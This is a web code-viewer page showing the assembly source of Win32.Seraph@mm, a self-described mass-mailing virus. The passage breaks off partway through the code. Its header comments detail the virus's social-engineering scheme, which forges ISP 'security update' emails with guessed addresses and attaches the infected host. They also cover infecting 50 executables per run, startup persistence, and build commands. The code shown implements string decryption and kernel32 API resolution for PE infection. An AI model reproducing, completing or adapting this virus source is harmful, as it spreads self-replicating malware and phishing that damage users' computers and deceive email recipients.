📄 29a-7.013
字号:
;
; [ Win32.Seraph@mm Vorgon/iKX ]
; [ 28672 bytes Target - PE ]
; [ 09/28/03 Made in Canada ]
;
;
;
;
; [ Introduction ]
;
; Seraph is a mass-mailing virus that takes advantage of social engineering. This may sound
; boring to you, but it takes social engineering to the next level. Seraph is an information
; gatherer. It takes data from websites, computers, URL's and uses what it finds to generate
; a convincing and personal email message.
;
; So what information does Seraph gather? Seraph gathers information about the Internet service
; provider of the computers it infects. Information such as:
;
; ISP Name example: AOL
; Domain example: AOL.COM
; Website example: WWW.AOL.COM
; Logo example: HTTP://www.aol.com/logo.gif
; Deadline example: SEPTEMBER 21, 2003
; Copyright String example: (C) 2003 AOL INC.
;
; What does Seraph do with this information? Seraph takes everything you see above and generates
; an email message in HTML format. The message containing a logo image, names, valid email
; addresses, etc, appears to be a security update from your ISP. Unsuspecting victims reading this
; email message see that they must install the attached update by the deadline date, or face
; disconnection of there Internet service.
;
; How does Seraph know the email addresses of other people on the same ISP? Seraph takes a list
; of the 1024 most popular surnames in the USA and randomly selects one. It then a appends a first
; initial either the start or the end of the surname. This gives a possible 53238 email addresses
; per ISP.
;
; Sure this will spread to users on the same ISP, but how does it spread to other ISP's? Seraph
; is highly infectious. Every time it runs it infects 50 files on all drives it can find on a
; computer, except CD-ROM and drive A. It will naturally find executables in file sharing
; directories, shared folders, and anything else you can imagine.
;
;
; [ Other ]
;
; I named this virus after Seraph from the Matrix Reloaded. Seraph (the Chinese guy Neo meets
; before meeting the Oracle) had golden code and was so spectacular because he came from the first
; incarnation of the matrix, which was heaven. "Seraph" is singular for the plural "seraphim". The
; seraphim are the highest choir of angels and included amongst others: Lucifer, Gabriele, Raziel
; and Malaciah, and they sit on the 8th level of Heaven just one below God.
;
;
; [ Bug Fixes ]
;
; Below are a list of bugs i have fixed in this version.
;
; -The find file code begins searching at the start of the first drive instead of the current
; Directory. This bug was causing the entire contents of the most important drive to be excluded
; from the search.
;
; -Files in the system directory are no longer infected. Infecting files in this directory was
; causing Windows to not boot at all.
;
; -The program to be run on start-up is no longer whatever infected program is executed. It has
; been changed to the program that was last infected. Before if the user deleted the infected
; email attachment after executing the virus it would not be able to run on start-up.
;
;
; [ The Infection ]
;
; Below is a break down of what the virus does in order:
;
; - Decrypt the virus
; - Get the address of GetModuleHandleA
; - Get the kernel32.dll address
; - Get the address of GetProcAddress
; - Load the win9x API functions
; - Create a thread to execute the rest of the virus code
; - Infect 50 files on drives B-Z, excluding CD-ROM
; - Make the last file infected run on start-up
; - Display an install message if the filename is patch110.exe
; - On February 23 display the pay load
; - Load the win2k API functions if the OS version permits
; - Get the IP address of the computer
; - Get the hostname of the computer
; - Extract the ISP domain from the host name of the computer
; - Download the main page of the internet service provider and handle redirections
; - Search the webpage for a logo image URL
; - Get the company name of the ISP
; - Create a dead line date for the email message
; - Generate an email address
; - Create the email message using all the data collected
; - Send the email message
; - Send the current host EXE as the update attachment.
; - Exit the thread
;
;
; [ Assembling ]
;
; tasm32 /ml /jLOCALS seraph
; tlink32 -aa -x /Tpe /c seraph,seraph,,import32.lib,,
; editbin /SECTION:CODE,rwe seraph.exe
;
;
; [ Greetz ]
;
; T00fic, Morphine, Eddow, Raid, Gigabyte, Kefi, SPTH, Kernel32
;
;
.486p
.MODEL flat, stdcall
EXTRN GetModuleHandleA : PROC
;-------------------------------------------------------------------------------------------------;
; Constants ;
;-------------------------------------------------------------------------------------------------;
; file I/O constants
OPEN_EXISTING EQU 3
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
FILE_SHARE_READ EQU 1
FILE_SHARE_WRITE EQU 2
FILE_BEGIN EQU 0
FILE_END EQU 2
; DNS constants
DNS_QUERY_STANDARD EQU 0
DNS_TYPE_PTR EQU 12
DNS_TYPE_MX EQU 15
DNSREC_ANSWER EQU 1
DNS_FREE_RECORD_LIST_DEEP EQU 1
; winsock constants
AF_INET EQU 2
SOCK_STREAM EQU 1
PCL_NONE EQU 0
SO_RCVTIMEO EQU 1006h
SO_SNDTIMEO EQU 1005h
SOL_SOCKET EQU 0FFFFh
; registry constants
HKEY_LOCAL_MACHINE EQU 80000002h
REG_SZ EQU 1
; MISC constants
GMEM_FIXED EQU 0
SECTION_RWE EQU 0E0000020h
TRUE EQU 1
FALSE EQU 0
EXIT_THREAD EQU 1
CRLF EQU 13, 10
DRIVE_CDROM EQU 5
;-------------------------------------------------------------------------------------------------;
; Structures ;
;-------------------------------------------------------------------------------------------------;
PE_HEADER STRUC
dwSignature DD 0
wMachine DW 0
wNumberOfSections DW 0
dwTimeDateStamp DD 0
dwPointerToSymbolTable DD 0
dwNumberOfSymbols DD 0
wSizeOfOptionalHeader DW 0
wCharacteristics DW 0
wMagic DW 0
cMajorLinkerVersion DB 0
cMinorLinkerVersion DB 0
dwSizeOfCode DD 0
dwSizeOfInitializedData DD 0
dwSizeOfUninitializedData DD 0
dwAddressOfEntryPoint DD 0
dwBaseOfCode DD 0
dwBaseOfData DD 0
dwImageBase DD 0
dwSectionAlignment DD 0
dwFileAlignment DD 0
wMajorOperatingSystemVersion DW 0
wMinorOperatingSystemVersion DW 0
wMajorImageVersion DW 0
wMinorImageVersion DW 0
wMajorSubsystemVersion DW 0
wMinorSubsystemVersion DW 0
dwReserved1 DD 0
dwSizeOfImage DD 0
dwSizeOfHeaders DD 0
dwCheckSum DD 0
wSubsystem DW 0
wDllCharacteristics DW 0
dwSizeOfStackReserve DD 0
dwSizeOfStackCommit DD 0
dwSizeOfHeapReserve DD 0
dwSizeOfHeapCommit DD 0
dwLoaderFlags DD 0
dwNumberOfRvaAndSizes DD 0
dwExportDirectoryVA DD 0
dwExportDirectorySize DD 0
dwImportDirectoryVA DD 0
dwImportDirectorySize DD 0
dwResourceDirectoryVA DD 0
dwResourceDirectorySize DD 0
dwExceptionDirectoryVA DD 0
dwExceptionDirectorySize DD 0
dwSecurityDirectoryVA DD 0
dwSecurityDirectorySize DD 0
dwBaseRelocationTableVA DD 0
dwBaseRelocationTableSize DD 0
dwDebugDirectoryVA DD 0
dwDebugDirectorySize DD 0
dwArchitectureSpecificDataVA DD 0
dwArchitectureSpecificDataSize DD 0
dwRVAofGPVA DD 0
dwRVAofGPSize DD 0
dwTLSDirectoryVA DD 0
dwTLSDirectorySize DD 0
dwLoadConfigurationDirectoryVA DD 0
dwLoadConfigurationDirectorySize DD 0
dwBoundImportDirectoryinheadersVA DD 0
dwBoundImportDirectoryinheadersSize DD 0
dwImportAddressTableVA DD 0
dwImportAddressTableSize DD 0
dwDelayLoadImportDescriptorsVA DD 0
dwDelayLoadImportDescriptorsSize DD 0
dwCOMRuntimedescriptorVA DD 0
dwCOMRuntimedescriptorSize DD 0
dwNULL1 DD 0
dwNULL2 DD 0
PE_HEADER ENDS
SECTION_HEADER STRUC
sAnsiName DB 8 DUP(0)
dwVirtualSize DD 0
dwVirtualAddress DD 0
dwSizeOfRawData DD 0
dwPointerToRawData DD 0
dwPointerToRelocations DD 0
dwPointerToLinenumbers DD 0
wNumberOfRelocations DW 0
wNumberOfLinenumbers DW 0
dwCharacteristics DD 0
SECTION_HEADER ENDS
DOS_HEADER STRUC
wSignature DW 0
wBytesInLastBlock DW 0
wBlocksInFile DW 0
wNumberOfRelocs DW 0
wHeaderParagraphs DW 0
wMinExtraParagraphs DW 0
wMaxExtraParagraphs DW 0
wSS DW 0
wSP DW 0
wChecksum DW 0
wIP DW 0
wCS DW 0
wRelocTableOffset DW 0
wOverlayNumber DW 0
sUnused DB 32 DUP(0)
lpPEHeader DD 0
DOS_HEADER ENDS
WSA_DATA STRUC
wVersion DW 0
wHighVersion DW 0
szDescription DB 257 dup(0)
szSystemStatus DB 129 dup(0)
iMaxSockets DW 0
iMaxUdpDg DW 0
lpVendorInfo DD 0
WSA_DATA ENDS
SOCK_ADDRESS STRUC
sin_family DW 0
sin_port DW 0
sin_addr DD 0
sin_zero DB 8 dup(0)
SOCK_ADDRESS ENDS
DNS_RECORD STRUC
pNext DD 0
pName DD 0
wType DW 0
wDataLength DW 0
flags DD 0
dwTtl DD 0
dwReserved DD 0
DNS_RECORD ENDS
SYSTEM_TIME STRUC
wYear DW 0
wMonth DW 0
wDayOfWeek DW 0
wDay DW 0
wHour DW 0
wMinute DW 0
wSecond DW 0
wMiliseconds DW 0
SYSTEM_TIME ENDS
WIN32_FIND_DATA STRUC
FileAttributes DD 0
CreateTime DQ 0
LastAccessTime DQ 0
LastWriteTime DQ 0
FileSizeHigh DD 0
FileSizeLow DD 0
Reserved0 DD 0
Reserved1 DD 0
FullFileName DB 260 dup(0)
AlternateFileName DB 14 dup(0)
WIN32_FIND_DATA ENDS
;-------------------------------------------------------------------------------------------------;
; Macros ;
;-------------------------------------------------------------------------------------------------;
ImportTable MACRO tableName
&tableName:
ENDM
EndImport MACRO
DB 0
ENDM
EndImportTable MACRO
DB '$'
ENDM
ImportDll MACRO dllName
sz&dllName DB '&dllName', '.dll', 0
ENDM
ImportFunction MACRO functionName
sz&functionName DB '&functionName', 0
&functionName DD 0
ENDM
ApiCall MACRO functionName
call [ebp+&functionName]
ENDM
pushptr MACRO variable
lea eax, [ebp+&variable]
push eax
ENDM
pushval MACRO variable
push [ebp+&variable]
ENDM
.DATA
DD 0 ; TASM gayness
;-------------------------------------------------------------------------------------------------;
; Code Section ;
;-------------------------------------------------------------------------------------------------;
.CODE
main:
;-------------------------------------------------------------------------------------------------;
; Load the virus and its resources. ;
;-------------------------------------------------------------------------------------------------;
; get the delta pointer
call getDeltaPointer ; where am i?!?!
getDeltaPointer:
pop edi
mov ebp, edi
sub ebp, offset getDeltaPointer
; very basic XOR decryption to hide strings
cmp ebp, 0
je encrypted
lea esi, [ebp+encrypted]
mov ecx, CODE_SIZE - (offset encrypted - offset main)
decrypt:
xor byte ptr [esi], 123
inc esi
loop decrypt
; all code from this point on will be encrypted
encrypted:
; get the image base
sub edi, 5
mov [ebp+lpStartOfCode], edi ; save the start of code
and edi, 0FFFFF000h ; round off the VA to the nearest page
findImageBase:
cmp word ptr [edi], 'ZM' ; start of image?
je findKernel
sub edi, 1000h
jmp findImageBase
; find the address of the kernel32
findKernel:
mov [ebp+lpImageBase], edi
mov eax, edi
mov ebx, [eax+3ch] ; ebx = pointer to the PE header
mov esi, [ebx+eax+128]
add esi, eax ; esi = pointer to the import section
xor ecx, ecx
findKernel32:
mov ebx, [esi+ecx+12] ; get an RVA to the dll name
cmp ebx, 0 ; no more dll's left?
je returnHostControl
add ebx, eax
cmp dword ptr [ebx], 'NREK' ; Kernel32.dll found?
je findGetModuleHandleA
add ecx, 20 ; next import
jmp findKernel32
findGetModuleHandleA:
mov edx, [esi+ecx]
sub edx, 4
lea esi, [esi+ecx]
xor ecx, ecx
findName:
inc ecx
add edx, 4
mov ebx, [edx+eax] ; next name
cmp ebx, 0 ; no more function names left?
je returnHostControl
lea ebx, [ebx+eax+2]
cmp dword ptr [ebx], 'MteG'
jne findName
cmp dword ptr [ebx+4], 'ludo'
jne findName
cmp dword ptr [ebx+8], 'naHe'
jne findName
cmp dword ptr [ebx+12], 'Aeld' ; GetModuleHandleA?
jne findName
; get the address of the GetModuleHandleA function
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -